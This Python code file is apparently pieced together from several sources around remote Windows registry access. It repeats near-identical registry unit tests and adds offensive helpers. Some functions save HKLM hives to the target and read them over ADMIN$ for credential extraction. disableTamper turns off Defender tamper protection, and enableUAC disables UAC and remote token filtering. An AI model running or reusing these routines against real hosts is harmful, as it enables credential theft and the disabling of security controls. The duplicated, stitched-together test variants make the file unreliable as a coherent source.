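def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
    """Round-trip a REG_SZ value through a temporary key under HKEY_CLASSES_ROOT.

    Creates ``BETO``, writes the value ``BETO2`` = ``HOLA COMO TE VA``, reads it
    back, deletes the value and finally deletes the key. The key deletion runs
    in ``finally`` so an exception in the set/query/delete-value steps does not
    leave the test key behind on the target.

    A failing ``hBaseRegSetValue`` is no longer swallowed with a print: the
    original exception is the useful failure signal for this test.
    """
    dce, _rpctransport, _ = self.connect()
    resp = rrp.hOpenClassesRoot(dce)
    resp.dump()
    regHandle = resp['phKey']
    resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00')
    resp.dump()
    phKey = resp['phkResult']
    try:
        resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00')
        resp.dump()
        # `type` is a builtin; use a distinct name for the returned value type.
        dataType, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00')
        resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00')
        resp.dump()
    finally:
        # Always remove the key created above, even if a step before failed.
        resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00')
        resp.dump()
    self.assertEqual('HOLA COMO TE VA\x00', data)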
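def __retrieve_hive(self, hive_name):
    """Save the registry hive ``hive_name`` on the target and return a ``RemoteFile`` for it.

    Opens HKEY_LOCAL_MACHINE over the remote registry pipe, opens ``hive_name``
    beneath it, saves that key to a randomly named file in the target's
    ``System32`` directory and returns a ``RemoteFile`` on that path via the
    ``ADMIN$`` share. Both registry handles are closed even when the save fails.

    Args:
        hive_name: registry path under HKLM to save (passed to hBaseRegCreateKey).

    Returns:
        RemoteFile positioned on the saved hive file.

    Raises:
        registryKey: if the hive cannot be opened.
    """
    # string.ascii_letters exists on both Python 2 and 3 (string.letters is 2-only).
    temp_filename = ''.join(random.choice(string.ascii_letters) for _ in range(8))
    ans = rrp.hOpenLocalMachine(self.__rrp)
    regHandle = ans['phKey']
    try:
        try:
            ans = rrp.hBaseRegCreateKey(self.__rrp, regHandle, hive_name)
        except Exception:
            raise registryKey('Cannot open %s hive' % hive_name)
        logger.debug('Saving %s hive to %s' % (hive_name, temp_filename))
        keyHandle = ans['phkResult']
        try:
            rrp.hBaseRegSaveKey(self.__rrp, keyHandle, temp_filename)
        finally:
            rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
    finally:
        rrp.hBaseRegCloseKey(self.__rrp, regHandle)
    # Open the saved file over SMB so it can be read later. An earlier variant
    # targeted the share root through DataStore.writable_share instead of ADMIN$.
    remote_fp = RemoteFile(self.smb, ntpath.join('System32', temp_filename), share='ADMIN$')
    return remote_fp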
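def disableTamper(self, dce):
    """Write ``TamperProtection = 0`` (REG_DWORD) under
    ``HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features`` via the remote registry pipe.

    Failure to open HKLM or the key is logged at debug level and aborts the
    call; a failed value write is logged and reported through
    ``self.logger.error``. Both registry handles are closed before returning
    (the original left them open).

    Args:
        dce: bound DCE/RPC connection to the remote registry service.
    """
    try:
        ans = rrp.hOpenLocalMachine(dce)  # handle for HKEY_LOCAL_MACHINE
        regHandle = ans['phKey']
    except Exception as e:
        logging.debug('Exception thrown when hOpenLocalMachine: %s', str(e))
        return
    try:
        try:
            resp = rrp.hBaseRegCreateKey(dce, regHandle, 'SOFTWARE\\Microsoft\\Windows Defender\\Features')
            keyHandle = resp['phkResult']
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegCreateKey: %s', str(e))
            return
        try:
            rrp.hBaseRegSetValue(dce, keyHandle, 'TamperProtection\x00', rrp.REG_DWORD, 0)
            self.logger.highlight('TamperProtection Key Set! TamperProtection is now off!')
        except Exception as e:
            # The original debug message said "EnableLUA" here (copied from enableUAC).
            logging.debug('Exception thrown when hBaseRegSetValue TamperProtection: %s', str(e))
            self.logger.error('Could not set TamperProtection Key')
        finally:
            rrp.hBaseRegCloseKey(dce, keyHandle)
    finally:
        rrp.hBaseRegCloseKey(dce, regHandle)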
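def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
    """Round-trip a REG_SZ value through a temporary key under HKEY_CLASSES_ROOT.

    Creates ``BETO``, writes ``BETO2`` = ``HOLA COMO TE VA``, reads it back,
    deletes the value and finally deletes the key. Written so it runs on both
    Python 2 and 3 (the original used the Python 2 ``print`` statement); the
    key deletion is in ``finally`` so a failure mid-way does not leave the
    test key on the target, and a failing set is no longer swallowed.
    """
    dce, _rpctransport, _ = self.connect()
    resp = rrp.hOpenClassesRoot(dce)
    resp.dump()
    regHandle = resp['phKey']
    resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00')
    resp.dump()
    phKey = resp['phkResult']
    try:
        resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00')
        resp.dump()
        # `type` is a builtin; use a distinct name for the returned value type.
        dataType, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00')
        resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00')
        resp.dump()
    finally:
        resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00')
        resp.dump()
    self.assertEqual('HOLA COMO TE VA\x00', data)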
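def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
    """Round-trip ``self.test_value_data`` through ``self.test_key`` under HKEY_CLASSES_ROOT.

    Creates the key, sets ``self.test_value_name`` (REG_SZ), reads it back,
    deletes the value and finally deletes the key. The key deletion is in
    ``finally`` so an exception in the set/query/delete-value steps does not
    leave the test key behind; a failing ``hBaseRegSetValue`` now fails the
    test instead of being printed and ignored.
    """
    dce, _rpctransport = self.connect()
    resp = rrp.hOpenClassesRoot(dce)
    resp.dump()
    regHandle = resp['phKey']
    resp = rrp.hBaseRegCreateKey(dce, regHandle, self.test_key)
    resp.dump()
    phKey = resp['phkResult']
    try:
        resp = rrp.hBaseRegSetValue(dce, phKey, self.test_value_name, rrp.REG_SZ, self.test_value_data)
        resp.dump()
        # `type` is a builtin; use a distinct name for the returned value type.
        dataType, data = rrp.hBaseRegQueryValue(dce, phKey, self.test_value_name)
        resp = rrp.hBaseRegDeleteValue(dce, phKey, self.test_value_name)
        resp.dump()
    finally:
        resp = rrp.hBaseRegDeleteKey(dce, regHandle, self.test_key)
        resp.dump()
    self.assertEqual(self.test_value_data, data)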
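def add(self, dce, keyName):
    """Create a subkey at ``keyName``, or set a value on it, on the remote registry.

    When ``self.__options.v`` is None the last path component of ``keyName``
    is created as a subkey (its parent is opened first as an access check).
    Otherwise value ``self.__options.v`` of type ``self.__options.vt`` (a
    ``REG_*`` constant name looked up on ``rrp``) is set to
    ``self.__options.vd``; DWORD/QWORD types are converted with ``int()``.
    Every key handle opened here is closed before returning.

    Args:
        dce: bound DCE/RPC connection to the remote registry service.
        keyName: full key path including the root key name.

    Raises:
        Exception: if ``vt`` is not a ``REG_*`` type name known to ``rrp``.
        ValueError: if ``vd`` is not an integer for a DWORD/QWORD type.
    """
    hRootKey, subKey = self.__strip_root_key(dce, keyName)
    # READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY should be equal to KEY_WRITE (0x20006)
    samDesired = READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY

    if self.__options.v is None:
        # Try to create subkey: open the parent as an access check, then
        # create the full subkey path relative to the root key.
        subKeyCreate = subKey
        parentKey = '\\'.join(subKey.split('\\')[:-1])
        ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, parentKey, samDesired=samDesired)
        rrp.hBaseRegCloseKey(dce, ans2['phkResult'])
        ans3 = rrp.hBaseRegCreateKey(dce, hRootKey, subKeyCreate, samDesired=samDesired)
        if ans3['ErrorCode'] == 0:
            rrp.hBaseRegCloseKey(dce, ans3['phkResult'])
            print('Successfully set subkey %s' % (keyName))
        else:
            print('Error 0x%08x while creating subkey %s' % (ans3['ErrorCode'], keyName))
        return

    # Try to set value of key. Validate the user-supplied type name before
    # resolving it, so only REG_* constants can be looked up on the module.
    if not self.__options.vt.startswith('REG_'):
        raise Exception('Error parsing value type %s' % self.__options.vt)
    dwType = getattr(rrp, self.__options.vt, None)
    if dwType is None:
        raise Exception('Error parsing value type %s' % self.__options.vt)

    # Fix (?) for packValue function: numeric types must be passed as int.
    if dwType in (
        rrp.REG_DWORD,
        rrp.REG_DWORD_BIG_ENDIAN,
        rrp.REG_DWORD_LITTLE_ENDIAN,
        rrp.REG_QWORD,
        rrp.REG_QWORD_LITTLE_ENDIAN,
    ):
        valueData = int(self.__options.vd)
    else:
        valueData = self.__options.vd

    ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey, samDesired=samDesired)
    try:
        ans3 = rrp.hBaseRegSetValue(dce, ans2['phkResult'], self.__options.v, dwType, valueData)
    finally:
        rrp.hBaseRegCloseKey(dce, ans2['phkResult'])
    if ans3['ErrorCode'] == 0:
        print('Successfully set key %s\\%s of type %s to value %s' % (
            keyName, self.__options.v, self.__options.vt, valueData))
    else:
        print('Error 0x%08x while setting key %s\\%s of type %s to value %s' % (
            ans3['ErrorCode'], keyName, self.__options.v, self.__options.vt, valueData))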
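def __retrieveHive(self, hiveName):
    """Save registry hive ``hiveName`` to a temporary file on the target and return a ``RemoteFile`` on it.

    Opens HKEY_LOCAL_MACHINE, opens ``hiveName`` beneath it, saves the key to
    ``SYSTEM32\\<random>.tmp`` and returns a ``RemoteFile`` over
    ``self.__smbConnection`` for that path. Both registry handles are closed
    even if the save fails.

    Raises:
        Exception: if the hive cannot be opened.
    """
    # string.ascii_letters works on Python 2 and 3; string.letters was removed in 3.
    tmpFileName = ''.join(random.choice(string.ascii_letters) for _ in range(8)) + '.tmp'
    ans = rrp.hOpenLocalMachine(self.__rrp)
    regHandle = ans['phKey']
    try:
        try:
            ans = rrp.hBaseRegCreateKey(self.__rrp, regHandle, hiveName)
        except Exception:
            raise Exception("Can't open %s hive" % hiveName)
        keyHandle = ans['phkResult']
        try:
            rrp.hBaseRegSaveKey(self.__rrp, keyHandle, tmpFileName)
        finally:
            rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
    finally:
        rrp.hBaseRegCloseKey(self.__rrp, regHandle)
    # Now let's open the remote file, so it can be read later
    remoteFileName = RemoteFile(self.__smbConnection, 'SYSTEM32\\' + tmpFileName)
    return remoteFileName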
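def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
    """Create key ``BETO`` under HKEY_CLASSES_ROOT and set ``BETO2`` = ``HOLA COMO TE VA`` on it.

    Only the create/set portion of the test is present in this excerpt; the
    query and delete steps implied by the name are not shown here. The
    ``except Exception, e`` form is Python 2 only; ``except Exception as e``
    with ``print(e)`` behaves the same on 2 and 3.
    """
    dce, rpctransport, phKey = self.connect()
    resp = rrp.hOpenClassesRoot(dce)
    regHandle = resp['phKey']
    resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00')
    phKey = resp['phkResult']
    try:
        resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00')
    except Exception as e:
        print(e)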
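def enableUAC(self, dce):
    """Write ``EnableLUA = 0`` and ``LocalAccountTokenFilterPolicy = 1`` (REG_DWORD)
    under ``HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System``.

    The original comment notes that, despite the method name, ``EnableLUA = 0``
    turns UAC off; the name follows the key being set. Failure to open HKLM or
    the key is logged at debug level and aborts the call; each value write is
    reported independently through ``self.logger``. Both registry handles are
    closed before returning (the original left them open).

    Args:
        dce: bound DCE/RPC connection to the remote registry service.
    """
    try:
        ans = rrp.hOpenLocalMachine(dce)
        regHandle = ans['phKey']
    except Exception as e:
        logging.debug('Exception thrown when hOpenLocalMachine: %s', str(e))
        return
    try:
        try:
            resp = rrp.hBaseRegCreateKey(
                dce, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System')
            keyHandle = resp['phkResult']
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegCreateKey: %s', str(e))
            return
        try:
            # EnableLUA
            try:
                rrp.hBaseRegSetValue(dce, keyHandle, 'EnableLUA\x00', rrp.REG_DWORD, 0)
                self.logger.highlight('EnableLUA Key Set!')
            except Exception as e:
                logging.debug('Exception thrown when hBaseRegSetValue EnableLUA: %s', str(e))
                self.logger.error('Could not set EnableLUA Key')
            # LocalAccountTokenFilterPolicy
            try:
                rrp.hBaseRegSetValue(dce, keyHandle, 'LocalAccountTokenFilterPolicy\x00', rrp.REG_DWORD, 1)
                self.logger.highlight('LocalAccountTokenFilterPolicy Key Set!')
            except Exception as e:
                logging.debug(
                    'Exception thrown when hBaseRegSetValue LocalAccountTokenFilterPolicy: %s', str(e))
                self.logger.error('Could not set LocalAccountTokenFilterPolicy Key')
        finally:
            rrp.hBaseRegCloseKey(dce, keyHandle)
    finally:
        rrp.hBaseRegCloseKey(dce, regHandle)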
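def checkTamper(self, dce):
    """Read and report the ``TamperProtection`` value under
    ``HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features``.

    Note that the key is opened with ``hBaseRegCreateKey``, so it is created
    on the target if it does not already exist. When the value cannot be read
    the original treats it as ``5`` and reports it as on; that assumption is
    kept here, with the query failure logged at debug level. Both registry
    handles are closed before returning (the original left them open).

    Args:
        dce: bound DCE/RPC connection to the remote registry service.
    """
    try:
        ans = rrp.hOpenLocalMachine(dce)  # handle for HKEY_LOCAL_MACHINE
        regHandle = ans['phKey']
    except Exception as e:
        logging.debug('Exception thrown when hOpenLocalMachine: %s', str(e))
        return
    try:
        try:
            resp = rrp.hBaseRegCreateKey(dce, regHandle, 'SOFTWARE\\Microsoft\\Windows Defender\\Features')
            keyHandle = resp['phkResult']
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegCreateKey: %s', str(e))
            return
        try:
            # TamperProtection: the value type is not used, only the data.
            _dataType, tp_value = rrp.hBaseRegQueryValue(dce, keyHandle, 'TamperProtection')
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegQueryValue: %s', str(e))
            tp_value = 5  # unreadable value is assumed to mean "on" (original behaviour)
        finally:
            rrp.hBaseRegCloseKey(dce, keyHandle)
    finally:
        rrp.hBaseRegCloseKey(dce, regHandle)
    if tp_value == 5:
        self.logger.highlight('TamperProtection = 5 (its on) ')
    else:
        self.logger.highlight('TamperProtection = {} (less than 5 is good)'.format(tp_value))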